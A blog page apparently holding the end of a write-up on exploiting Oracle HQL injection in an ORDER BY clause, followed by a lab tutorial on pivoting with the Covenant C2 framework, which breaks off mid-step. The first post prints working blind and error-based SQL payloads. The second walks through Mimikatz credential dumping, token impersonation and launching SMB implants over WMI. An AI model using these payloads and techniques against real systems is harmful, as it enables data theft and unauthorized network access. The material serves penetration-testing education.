<p></p><p><span style="color: #fcff01; font-size: x-large;"><u>Available research:</u></span></p><p>There is an awesome research presented by "Mikhail Egorov" regarding the exploitation of the HQL injection attack in different type of database servers:<br /></p><p> <a href="https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm">https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm</a> <br /></p><p>For Oracle database, below mentioned payload can be used to exploit Boolean-based Blind injection </p><p><textarea cols="30" rows="2" style="height: 27px; width: 565px;">AND NVL(TO_CHAR(DBMS_XMLGEN.getxml('Inline_SQL_query_goes_here')),'1')!='1'</textarea></p><p></p><p>The web application responds with different HTTP content (depends on the true/false codition)<span style="font-size: large;"><br /></span></p><p><u><span style="color: #fcff01; font-size: x-large;">Limitation in this case</span><span style="font-size: x-large;"> <br /></span></u></p><p>In my case, following was the limitation:<br /></p><ul style="text-align: left;"><li><span>The available payload is converting and comparing output of the inline SQL query with value 1. Whereas "Order by" caluse does not allow use of comparison operator such as <,>,= outside the function or inline SQL query</span><br /></li></ul><p>As user data is getting passed to "Order by" clause, which has some specific rules. </p><p>To inject payload we need to take care of following things:</p><p></p><p>
<span style="color: #f1c232;">Syntax which is supported:- </span></p><p><b> </b><textarea cols="30" rows="5" style="height: 61px; width: 485px;"> ORDER BY (inline SQL query)
or
ORDER BY some_function(inline SQL query)</textarea></p><p></p><p></p><p><span style="color: #f1c232;">Syntax which is not supported:-<b> </b></span></p><p><b> </b><textarea cols="30" rows="5" style="height: 60px; width: 486px;"> ORDER BY (inline SQL query) = some_value
or
ORDER BY some_function(inline SQL query) = some_value</textarea></p><p></p><p></p><p><span style="color: #fcff01; font-size: x-large;"><u>Key to kingdom:</u></span></p><p>To exploit this vulnerable endpoint, I came up with following pointers. <br /></p><p><span style="color: #ffa400;">👉</span> Select statement will not be evaluated if condition is false:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvwjgMwtqlONczqPaDrsqiDP7d3SPpKLbHZQnFyHfKvbdpH8a3VSDzHX_GqVcf3ovnhNqqUwHFOUkwmORQh2oNxCWlUB8FTiCn2GWopYsQ9-aYfMj077-jFvCDPi03U6GKfPjlmAAjH4E0B5ILSVPrs-5SOYhCGS4FPWOOArKlvAQkPU7oofE8cxOK/s503/eval1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="401" data-original-width="503" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvwjgMwtqlONczqPaDrsqiDP7d3SPpKLbHZQnFyHfKvbdpH8a3VSDzHX_GqVcf3ovnhNqqUwHFOUkwmORQh2oNxCWlUB8FTiCn2GWopYsQ9-aYfMj077-jFvCDPi03U6GKfPjlmAAjH4E0B5ILSVPrs-5SOYhCGS4FPWOOArKlvAQkPU7oofE8cxOK/s16000/eval1.png" /></a></div><br /> <span style="color: #ffa400;">👉</span>Select statement will be evaluated if condition is true:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFMeNyQ6mNpiqQFX9U7Cy-8NljxmGF3Fmc9M3U_1qxyWcy2_om8U2ZTXjonqV-yU9-Mg5rREQujKT4p-Xd6rGj4SbmRV-aOQHA4mK0eFCGmIlsnd9RYC6fsiAhHs-rdh3mmHdm-hF2fxXWuSSaKwaG8OExmbI2vaMHQFujqKumYxVzrpAh9r31IXFK/s512/eval2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="335" data-original-width="512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFMeNyQ6mNpiqQFX9U7Cy-8NljxmGF3Fmc9M3U_1qxyWcy2_om8U2ZTXjonqV-yU9-Mg5rREQujKT4p-Xd6rGj4SbmRV-aOQHA4mK0eFCGmIlsnd9RYC6fsiAhHs-rdh3mmHdm-hF2fxXWuSSaKwaG8OExmbI2vaMHQFujqKumYxVzrpAh9r31IXFK/s16000/eval2.png" /></a></div> <span style="color: #ffa400;">👉</span>Select statement will be evaluated if condition is true:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFMeNyQ6mNpiqQFX9U7Cy-8NljxmGF3Fmc9M3U_1qxyWcy2_om8U2ZTXjonqV-yU9-Mg5rREQujKT4p-Xd6rGj4SbmRV-aOQHA4mK0eFCGmIlsnd9RYC6fsiAhHs-rdh3mmHdm-hF2fxXWuSSaKwaG8OExmbI2vaMHQFujqKumYxVzrpAh9r31IXFK/s512/eval2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="335" data-original-width="512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFMeNyQ6mNpiqQFX9U7Cy-8NljxmGF3Fmc9M3U_1qxyWcy2_om8U2ZTXjonqV-yU9-Mg5rREQujKT4p-Xd6rGj4SbmRV-aOQHA4mK0eFCGmIlsnd9RYC6fsiAhHs-rdh3mmHdm-hF2fxXWuSSaKwaG8OExmbI2vaMHQFujqKumYxVzrpAh9r31IXFK/s16000/eval2.png" /></a></div><p><span style="color: #fcff01; font-size: x-large;"><u>Exploitation - Exception for the win</u></span><span style="font-size: large;"><span style="color: #fcff01;"> </span>🤘😎🤘:</span></p><p>For exploitation, I will be using:</p><p><span style="color: #ffa400;">👉</span> Inject inline queries which raise an exception when condition is true<br /><span style="color: #ffa400;">👉</span> To raise an exception, use tricks such as '<span style="color: #fcff01;">division by zero</span>' or<br /><span style="color: #ffa400;">👉 </span>A function which complains about an invalid format argument such as <span style="color: #fcff01;">To_date()</span> function <br /></p><p>Below mentioned is the inline query based on '<span style="color: #fcff01;">division by zero</span>'approach:</p><pre><code class="hljs sql"></code></pre><pre></pre><p><textarea cols="30" rows="2" style="height: 27px; width: 565px;">(SELECT 1/0 FROM dual where true/false_condition)</textarea></p><p></p><p>And this one ishaving <span style="color: #fcff01;">To_date()</span> function with an invalid format:</p><p></p><pre><code class="hljs sql"></code></pre>
<textarea cols="30" rows="2" style="height: 27px; width: 565px;">(SELECT TO_DATE(1337, 'b0x') FROM dual where true/false_condition)</textarea>
<p>Let's observe and confirm the behaviour of inline query having <span style="color: #fcff01;">To_date()</span> function with invalid format.</p><p>Inline SQL query with true condition was executed and Oracle database raised an error because 'b0x' is not a valid date format:</p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2UF2Fgx-avQhhlMlB5T9iXISdOKfZORYFNdVNwIpsrVY-fBk5Xu3Gq4U0qfjCvR5UJFFMyFzBpIySXAn6OR9giHyrup7UZw4bBCRvWLNll3MqYcuyEMgnyvHOu5bdbD8AA967-5fpPobDeqwtEteA1SwS9pHVFbzEG5_FKn5B-q-f1XCPiL_ejtQl/s597/date.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="597" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2UF2Fgx-avQhhlMlB5T9iXISdOKfZORYFNdVNwIpsrVY-fBk5Xu3Gq4U0qfjCvR5UJFFMyFzBpIySXAn6OR9giHyrup7UZw4bBCRvWLNll3MqYcuyEMgnyvHOu5bdbD8AA967-5fpPobDeqwtEteA1SwS9pHVFbzEG5_FKn5B-q-f1XCPiL_ejtQl/s16000/date.png" /></a></div><p>Now, let's use this inline query in the existing payload and construct a final payload which can exploit HQL injection for our case:</p><p>👉True condition payload:<br /></p><p></p><pre><code class="hljs sql"></code></pre><p>
<textarea cols="30" rows="2" style="height: 31px; width: 720px;">ASCII(DBMS_XMLGEN.getxml('SELECT TO_DATE(1337, ''b0x'') FROM dual where user=''Database_User'''))</textarea> </p><p> 👉False condition payload:</p><p></p><pre><code class="hljs sql"></code></pre>
<textarea cols="30" rows="2" style="height: 27px; width: 733px;">ASCII(DBMS_XMLGEN.getxml('SELECT TO_DATE(1337, ''b0x'') FROM dual where user=''Random_String'''))</textarea> <p> We have reached to end of the blog post 😎</p><p>I would like to say "Thank you" to <a href="https://twitter.com/irsdl" target="_blank">@Soroush Dalili</a> sir and <a href="https://twitter.com/NomanRiffat" target="_blank">@Noman Riffat</a> bhai ji who helped me a lot during the exploitation of this injection.</p><p>./init 0<br /></p><p> </p>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-22713482939198589492022-07-10T16:09:00.014+05:302023-11-22T11:25:44.621+05:30Covenant C2 for OSCP AD lab - Part 2<p> Hello all,<span></span></p><a name='more'></a>In this blog post, I am going demonstrate how to
pivot inside the private network and connect to interanet based machine
using Covenant C2 framework.<p></p><p>For basic setup, please have a look on part-1 of this blog post series.</p><p></p><h1 style="text-align: left;"><span style="font-size: x-large;"><span style="color: #ffa400;"><span style="font-weight: normal;"><u>AD environment setup and pivoting scenario:</u></span></span></span></h1><p>I have 2 machines in my current AD environment:</p><p><span style="color: white;">1.</span> <span style="color: white;">Workstation-PC (Machine A)</span>: 172.20.10.9, 192.168.56.111</p><p><span style="color: white;">2. WIN-A08PEI13CFI (Machine A)</span>: 192.168.56.110</p><p><span style="color: white;">Attacker Machine</span>: 172.20.10.10 (Covenant machine) <br /></p><p>We have access on Machine <span style="color: white;">Workstation-PC</span> and want to gain access to <span style="color: white;">WIN-A08PEI13CFI</span> but direct access to <span style="color: white;">WIN-A08PEI13CFI </span>is not possible.</p><p>I am assuming that we have <span style="color: white;">impersonated a user</span> or <span style="color: white;">got credentials</span> who has access to machine <span style="color: white;">WIN-A08PEI13CFI</span>. </p><p>By impersonating the user session or using the creds, we will launch <span style="color: white;">SMB based Grunt</span> on <span style="color: white;">Machine B</span> and then will connect to that Grunt using HTTP based grunt which is running on <span style="color: white;">Machine A</span>.</p><p>The flow diagram is something like this:</p><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoKl9JAk2P_fNcIVvxh6sYAM6KVko920pNPF-yCeagiEPNHnfSSmINJF98DKHbjePD3aq8FQlIXj4BYMq7AZseDhGJhZkBgIKveQ_vBWT-Hoj-5kv8ui15vzuhhs8aYteFV7PyLN0N0VyajV0UFSawMyeSqsf-ra4NVgUpiQdhGP4glXdSeQGGelbc/s1088/covenant.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="886" data-original-width="1088" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoKl9JAk2P_fNcIVvxh6sYAM6KVko920pNPF-yCeagiEPNHnfSSmINJF98DKHbjePD3aq8FQlIXj4BYMq7AZseDhGJhZkBgIKveQ_vBWT-Hoj-5kv8ui15vzuhhs8aYteFV7PyLN0N0VyajV0UFSawMyeSqsf-ra4NVgUpiQdhGP4glXdSeQGGelbc/s16000/covenant.png" /></a></div><p><br /></p><h1 style="text-align: left;"><span style="font-size: x-large;"><span style="color: #ffa400;"><span style="font-weight: normal;"><u>Pivoting using different Covenant 'Task':</u></span></span></span></h1><p>In
Covenant, we have a number of 'Task' using which we can pivot to
Interanet based machine. For these Task, we are either going to
impersonate a user or going to use creds to access machine B.</p><p>We will try following methods:</p><p></p><h3 style="text-align: left;"><span style="color: #fcff01;"><span><span style="background-color: black;"><span><span style="font-weight: normal;">1. Using plain text creds</span></span></span></span></span></h3><h4 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;">a) WMIGrunt<br />b) WMICommand<br />c) PowerShellRemotingCommand<br />d) PowerShellRemotingGrunt <br /></span></span></span></span></h4><h3 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;"><span style="color: #fcff01;">2. Using Impersonated user session</span><br /></span></span></span></span></h3><h4 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;">a) WMIGrunt<br />b) PowerShellRemotingGrunt</span></span></span></span></h4><p><span style="color: white;">Creating HTTP listener</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj19dGp-cetL0gm5smlzHd2yU-sX9uO-K4Gj_q2HOAk6OspZcwlQlpwAKuA9ORjbKetmepU56WSCYn_CDmc7n5hH_3KrIcth33GqJNyfJwPJ56y7dyO9hLo7T77AAMddykNsy-9KJqTNzR-PqkfbfTH7IfYVJSLZIQXEVATvoHTfMI7Z5YX-qS8EsyP/s816/11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="816" data-original-width="777" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj19dGp-cetL0gm5smlzHd2yU-sX9uO-K4Gj_q2HOAk6OspZcwlQlpwAKuA9ORjbKetmepU56WSCYn_CDmc7n5hH_3KrIcth33GqJNyfJwPJ56y7dyO9hLo7T77AAMddykNsy-9KJqTNzR-PqkfbfTH7IfYVJSLZIQXEVATvoHTfMI7Z5YX-qS8EsyP/s16000/11.png" /></a></div><p></p><p>We have Grunt connection from machine A which is having external IP 172.20.10.9:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJui5WuguaP0gZBvJZA6bFOkkZTu-iz4qd4oJ1iPujlqduSjJcPwHG6oW3-KPCdqGrQzvT0yMMLnWfj5VsHobcS5Le5AZtOnF5ERdrs22S3tU1oDE8v3N2DC8Wg98Ipm_UmKmfo1xjbSvOJHxUnhX5uxBT7esICtkvKTuCIeAYiyK5FlWJQ4tqvzW/s1334/13.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="786" data-original-width="1334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJui5WuguaP0gZBvJZA6bFOkkZTu-iz4qd4oJ1iPujlqduSjJcPwHG6oW3-KPCdqGrQzvT0yMMLnWfj5VsHobcS5Le5AZtOnF5ERdrs22S3tU1oDE8v3N2DC8Wg98Ipm_UmKmfo1xjbSvOJHxUnhX5uxBT7esICtkvKTuCIeAYiyK5FlWJQ4tqvzW/s16000/13.png" /></a></div><br /> This machine has 2 interfaces and second one is connected to intranet<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0a2BnoKagYYwiROK4sqGYrSLp73NIuMsz59huDnPKo_BZ6UBExC8pEW5v0YEVLiu3z8l4JAjMR_WrO9cCFlaBA_8IGBE9qgUybHfgTjBtv6YOoVvUBGBDsbTUKxaTvUx9SwS2R8sy3edO-CXLSsaLMe41ic8ibYTMylj8EiAA191WgKMta4NXlQ2g/s967/14.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="724" data-original-width="967" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0a2BnoKagYYwiROK4sqGYrSLp73NIuMsz59huDnPKo_BZ6UBExC8pEW5v0YEVLiu3z8l4JAjMR_WrO9cCFlaBA_8IGBE9qgUybHfgTjBtv6YOoVvUBGBDsbTUKxaTvUx9SwS2R8sy3edO-CXLSsaLMe41ic8ibYTMylj8EiAA191WgKMta4NXlQ2g/s16000/14.png" /></a></div><p></p><p>There is a machine in intranet which has private IP and accessible through machine A only:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigRikhlTLm86bT7e2SwPktVuVPJ-NDLtod5S9DjntyUckPYo0PlLEfU79I8x0iJPwUitaznBapOcDdfz4x4W19L9LRInlplDhxiFAAfoX2wWodtrlsBpB8uVsYYTuALLVFYNLIBHv0kD67yQPeNfa0iBDPyBlz38Q6KmP-eIOBuGCu1fObnIooAb8T/s888/15.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="578" data-original-width="888" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigRikhlTLm86bT7e2SwPktVuVPJ-NDLtod5S9DjntyUckPYo0PlLEfU79I8x0iJPwUitaznBapOcDdfz4x4W19L9LRInlplDhxiFAAfoX2wWodtrlsBpB8uVsYYTuALLVFYNLIBHv0kD67yQPeNfa0iBDPyBlz38Q6KmP-eIOBuGCu1fObnIooAb8T/s16000/15.png" /></a></div><p></p><p>How to reach <span style="color: white;">machine B</span> using<span style="color: white;"> machine A</span>?</p><p></p><p>Well
we have SMBGrunt in Covenant which can help us. Using Machine A, we
will launch SMB based Grunt on machine B and then will connect to that
SMB grunt </p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. Dumping plain text creds<br /></span></span></span></h3><p>Using Mimikatz module, dump the credentials of the logged in users:<br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsu0p_aKg-rWfTdq2Jrfhn8ydHbyHnOHHMASiibGB8zG_H_sOwzF-fFCXj5ACxxgUGh3Oyr85Se1jQUQChKaVsrCvQij5egTMXk17_Uncwrz4zhJQhYNi-ka1yawQeZiWtH3bawUXnvdwSgp0blOIRDYmBAkJnOcqUrXVtHi6af4iUyVst0QVWnbsW/s848/17.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="848" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsu0p_aKg-rWfTdq2Jrfhn8ydHbyHnOHHMASiibGB8zG_H_sOwzF-fFCXj5ACxxgUGh3Oyr85Se1jQUQChKaVsrCvQij5egTMXk17_Uncwrz4zhJQhYNi-ka1yawQeZiWtH3bawUXnvdwSgp0blOIRDYmBAkJnOcqUrXVtHi6af4iUyVst0QVWnbsW/s16000/17.png" /></a></div><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. (a) WMIGrunt (using dumpped creds)</span></span></span></h3><p><span style="color: white;"><b>Configure launcher</b></span><br /></p><p>Let's configure the PowerShell based Launcher in Launchers section.
Note that, I have selected <span style="color: white;">ImplantTemplate</span> as <span style="color: white;">GruntSMB</span> and <span style="color: white;">SMBPipeName </span>is <span style="color: white;">smbconnect_1</span>:</p><p></p><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8gXxtAOsq4TviyKoYL4tbCT_i_nF3yBByvJWZk-8bViphXPVZgZB9paB6bjWLjc7joy4T6DJ2xpZfEu8Xv-8uCd9IovmttU5RfZQhmZrqZWy8qnYMsbvoQ6RphFuGm1WFWHzDDM1CWe0NgTSif5Yu_UhSnXmf-GjxSV2gHnCQYDlMF_YPR376Bkrw/s945/wmigrunt_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="696" data-original-width="945" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8gXxtAOsq4TviyKoYL4tbCT_i_nF3yBByvJWZk-8bViphXPVZgZB9paB6bjWLjc7joy4T6DJ2xpZfEu8Xv-8uCd9IovmttU5RfZQhmZrqZWy8qnYMsbvoQ6RphFuGm1WFWHzDDM1CWe0NgTSif5Yu_UhSnXmf-GjxSV2gHnCQYDlMF_YPR376Bkrw/s16000/wmigrunt_2.png" /></a></div><p><span style="color: #fcff01;">Make Token using extracted creds:</span> <br /></p><p>Now, we will make a token for thw user using which we want to launch SMB based grunt on
target machine. To do so, we need to use MakeToken module. Specify the
details such as username, password and domain (it will be . in case user
is not a domain user but a local one):</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO4XyE6R02aD2jheSL53V9kMsmDXRLSCaLYDpWo0gKEpIOPLWi8rS_G372Q1vqOSr-ZP3NneXmw2mwWowqnzcGeDBRWO1wLYSsZPtrTmTAhn41gBUgU1JFLPJlY8Dd71lnWqBhEUsQh7OWcUmmEWAq8ymnYmTUl5QxLE5NHu64U1u69vt3lprkT0CG/s654/make%20token.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="616" data-original-width="654" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO4XyE6R02aD2jheSL53V9kMsmDXRLSCaLYDpWo0gKEpIOPLWi8rS_G372Q1vqOSr-ZP3NneXmw2mwWowqnzcGeDBRWO1wLYSsZPtrTmTAhn41gBUgU1JFLPJlY8Dd71lnWqBhEUsQh7OWcUmmEWAq8ymnYmTUl5QxLE5NHu64U1u69vt3lprkT0CG/s16000/make%20token.png" /></a></div><p></p><p>After clicking task button, we will have a messsage like this:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCgkPaQmrJdhwOCE8W3L5jaPBK2V0fZuOFu5AXcoSmP1hNTUGR4KFYrZHL8pX-xMvmdXBiBneNe2WeWOmwMos7h_Q_bUwZBjAm6wbtLpQto-FYg35NCV_QP0_EMdNQYVC-PMVXEWAsCrGb-Huim1iFJZXZzmqGkmacdOt-Hct45m_2oObPfTyZ3sxS/s885/make%20token2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="92" data-original-width="885" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCgkPaQmrJdhwOCE8W3L5jaPBK2V0fZuOFu5AXcoSmP1hNTUGR4KFYrZHL8pX-xMvmdXBiBneNe2WeWOmwMos7h_Q_bUwZBjAm6wbtLpQto-FYg35NCV_QP0_EMdNQYVC-PMVXEWAsCrGb-Huim1iFJZXZzmqGkmacdOt-Hct45m_2oObPfTyZ3sxS/s16000/make%20token2.png" /></a></div><p> Now,
in tasks section, select <span style="color: white;">WMIGrunt </span>and specify theinformation such as
computername, Launcher, username, password and domain name:<br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJBOH0C4EFzpzy_fGmC8CJ42jDxUhtcv5XCg5j6VJw9GR5uvhz21vlK4LyxUz601q206FQJNFA3CYgf72Pf_1lH2zpB7xrAv42AEL2M1HNdYHwfbXzQxZhhU1aTU3J-kjYsZvUnzur9DPNQmTsuu3zYkqxUOBgNHznsMjfKaCQwkQta4KL5OTz7wXM/s659/wmigrunt_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="623" data-original-width="659" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJBOH0C4EFzpzy_fGmC8CJ42jDxUhtcv5XCg5j6VJw9GR5uvhz21vlK4LyxUz601q206FQJNFA3CYgf72Pf_1lH2zpB7xrAv42AEL2M1HNdYHwfbXzQxZhhU1aTU3J-kjYsZvUnzur9DPNQmTsuu3zYkqxUOBgNHznsMjfKaCQwkQta4KL5OTz7wXM/s16000/wmigrunt_1.png" /></a></div><p></p><p>Afer execting the task, we need to wait for task to get finished:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwzN2oMAgLysBdLECQ02n6o4KAFmXCRMUoXG_aq6sIgG1XX70mj9bKuG1sgZHj8ELuETr394MBDaxpNwaG0SBrEwIqQDvL9lPYzNiEaHrslTy7CdTRDzQzPj-rjeDsZP_YIfD3f4ZIjAIn3Nt4ZaLELdWkBBFFhcqwASjqKDd5vLStjYPpzlLib0Og/s871/wmigrunt_active2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="130" data-original-width="871" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwzN2oMAgLysBdLECQ02n6o4KAFmXCRMUoXG_aq6sIgG1XX70mj9bKuG1sgZHj8ELuETr394MBDaxpNwaG0SBrEwIqQDvL9lPYzNiEaHrslTy7CdTRDzQzPj-rjeDsZP_YIfD3f4ZIjAIn3Nt4ZaLELdWkBBFFhcqwASjqKDd5vLStjYPpzlLib0Og/s16000/wmigrunt_active2.png" /></a></div><p></p><p>Let's connect to the SMB grunt launched on the target machine. To do so, we need to execute below mentioned command:</p><textarea style="height: 28px; margin: 0px; width: 350px;">connect target_machine_hostname SMBPipeName</textarea><p>in my case it was </p><textarea style="height: 28px; margin: 0px; width: 300px;">connect WIN-A08PEI13CFI smbconnect_1</textarea><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV4JP7ryqgubwym0omeymr4KQGP8QBqEa9Y5-8kIAwFTRCrFaACUtrdVEo5K3QFOxYTwX0FOo9m_QgK2WiI6eJ4mYtnlcp9tjTp6P6cH850yd_wlHtxQ5LFh0C8MqA0ZhWma2MyvGOdVOXqKxVp1g0ukowxq20RYLVUvhN0hIUOy1hN7gCAAkoNRZH/s1299/wmigrunt_active.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="470" data-original-width="1299" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV4JP7ryqgubwym0omeymr4KQGP8QBqEa9Y5-8kIAwFTRCrFaACUtrdVEo5K3QFOxYTwX0FOo9m_QgK2WiI6eJ4mYtnlcp9tjTp6P6cH850yd_wlHtxQ5LFh0C8MqA0ZhWma2MyvGOdVOXqKxVp1g0ukowxq20RYLVUvhN0hIUOy1hN7gCAAkoNRZH/s16000/wmigrunt_active.png" /></a></div><br />We got connection from <span style="color: white;">machine B</span> as well. <br /><p></p><p>To access the grunt, go to Grunt section:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnyxcmh9FMmP82U6jHSqlwuEPMhCbxfO0RDFNSniQ3D_Hy3VSusImtrw6BmxpNCeRmkovTrRcRn-5_GCBU-uCXseUrVmaFrfz45rLO5ewPMxy2I4H1hT6aPVVqOZXA91oVdk8KRhKVzmx1SHzvG3ruECbDmGQDejU04887OZIfLwdJ4tb13qWyRQgC/s1380/wmigrunt_active3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="698" data-original-width="1380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnyxcmh9FMmP82U6jHSqlwuEPMhCbxfO0RDFNSniQ3D_Hy3VSusImtrw6BmxpNCeRmkovTrRcRn-5_GCBU-uCXseUrVmaFrfz45rLO5ewPMxy2I4H1hT6aPVVqOZXA91oVdk8KRhKVzmx1SHzvG3ruECbDmGQDejU04887OZIfLwdJ4tb13qWyRQgC/s16000/wmigrunt_active3.png" /></a></div><p>And here we go:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNyHL5Jo83KFK946YB0F-SBZgPzfN_T7uaF6DeHpix1Hvrzx-6NTFlrVIgit2c72QVLjQqQGStCFT_BuNHEslqXAPygYPA1F3AEdJgVisOrNH_25H1wkW3kP5tbgaTnfkS3qaf_qOVgj2R6sD2kjOrl50d24e0mbOV_F0eOLpsFGWRZ7NKqx7WmMiP/s670/wmigrunt_active4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="658" data-original-width="670" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNyHL5Jo83KFK946YB0F-SBZgPzfN_T7uaF6DeHpix1Hvrzx-6NTFlrVIgit2c72QVLjQqQGStCFT_BuNHEslqXAPygYPA1F3AEdJgVisOrNH_25H1wkW3kP5tbgaTnfkS3qaf_qOVgj2R6sD2kjOrl50d24e0mbOV_F0eOLpsFGWRZ7NKqx7WmMiP/s16000/wmigrunt_active4.png" /></a></div><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. (b) WMICommand (using dumpped creds)</span></span></span></h3><p><span style="color: white;"><b>Configure launcher</b></span></p><p>Let's configure the PowerShell based Launcher in Launchers section.
Note that, I have selected <span style="color: white;">ImplantTemplate </span>as <span style="color: white;">GruntSMB </span>and <span style="color: white;">SMBPipeName </span>is <span style="color: white;">smbconnect_2</span>:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAq_dYcKXEzQBq7fOp_cnQKXXfGK2W6bDlr2e7IdR4EGWtmcP0WChP5CdG8WHEnQD7M2u_FBRZPKUKE1qobMGDMhVHUyY1c_wmsNeJijWlJcY1ORw3Ws1TJk3s-p1B4_-W8dzcqViuouvXFGxRbfDUrbKXtLRwiP2Au0Qxh9wsIeZyGJSC9IYIqjCN/s1613/wmic1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="766" data-original-width="1613" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAq_dYcKXEzQBq7fOp_cnQKXXfGK2W6bDlr2e7IdR4EGWtmcP0WChP5CdG8WHEnQD7M2u_FBRZPKUKE1qobMGDMhVHUyY1c_wmsNeJijWlJcY1ORw3Ws1TJk3s-p1B4_-W8dzcqViuouvXFGxRbfDUrbKXtLRwiP2Au0Qxh9wsIeZyGJSC9IYIqjCN/s16000/wmic1.png" /></a></div>After clicking Generate button, copy the generated PowerShell payload.<br /><p></p><p></p><p><span style="color: white;">Dont forget to perform make token step (demonstrated in method 1(a)) </span><br /></p><p>Now,
switch to Grunt and select <span style="color: white;">WMICommand </span>task. In task, paste the copied
PowerShell payload in <span style="color: white;">Command </span>input box from previous step. Specify
the other parameters and click 'Task' button to launch SMB grunt on
